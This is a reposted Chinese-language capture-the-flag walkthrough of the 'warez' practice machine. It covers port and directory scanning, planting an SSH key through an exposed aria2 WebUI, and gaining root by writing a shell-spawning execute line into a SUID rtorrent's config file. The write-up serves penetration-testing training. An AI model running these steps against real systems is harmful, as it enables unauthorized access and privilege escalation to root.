【OSCP】warez

admin 2024年9月26日13:17:26评论4 views字数 2453阅读8分10秒阅读模式
【OSCP】warez

OSCP 靶场

【OSCP】warez

靶场介绍

warez

easy

webui-aria2、webui-aria2写入公钥、rtorrent提权

信息收集

主机发现

【OSCP】warez

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.55
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 03:57 EST
Nmap scan report for 192.168.1.55
Host is up (0.00096s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
| 256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_ 256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:80:5D:88 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.1.55

目录扫描

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.55 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.55
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.55/index.html (Status: 200) [Size: 81758]
http://192.168.1.55/flags (Status: 301) [Size: 169] [--> http://192.168.1.55/flags/]
http://192.168.1.55/robots.txt (Status: 200) [Size: 12]
http://192.168.1.55/result.txt (Status: 200) [Size: 1585]

【OSCP】warez

权限获取

aria2 webui 这里我们可以看到访问设置为carolina 账号的家目录

【OSCP】warez

我们尝试将公钥上传到carolina 账号里面

【OSCP】warez

【OSCP】warez

上传公钥成功,使用ssh 连接成功获取权限。

【OSCP】warez

ssh [email protected]

【OSCP】warez

【OSCP】warez

权限提升

使用如下命令查看suid 二进制文件,发现 rtorrent 存在可利用的可能,尝试对其进行利用。

【OSCP】warez

【OSCP】warez

carolina@warez:/tmp$ echo "execute = /bin/sh,-p,-c,"/bin/sh -p <$(tty) >$(tty) 2>$(tty)"" >~/.rtorrent.rc
carolina@warez:/tmp$ rtorrent
# id
uid=1000(carolina) gid=1000(carolina) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(carolina)
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
HMVKeepsharing
#

【OSCP】warez

End

“点赞、在看与分享都是莫大的支持”

【OSCP】warez

【OSCP】warez

原文始发于微信公众号(贝雷帽SEC):【OSCP】warez

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月26日13:17:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】warezhttps://cn-sec.com/archives/3115181.html

发表评论

匿名网友 填写信息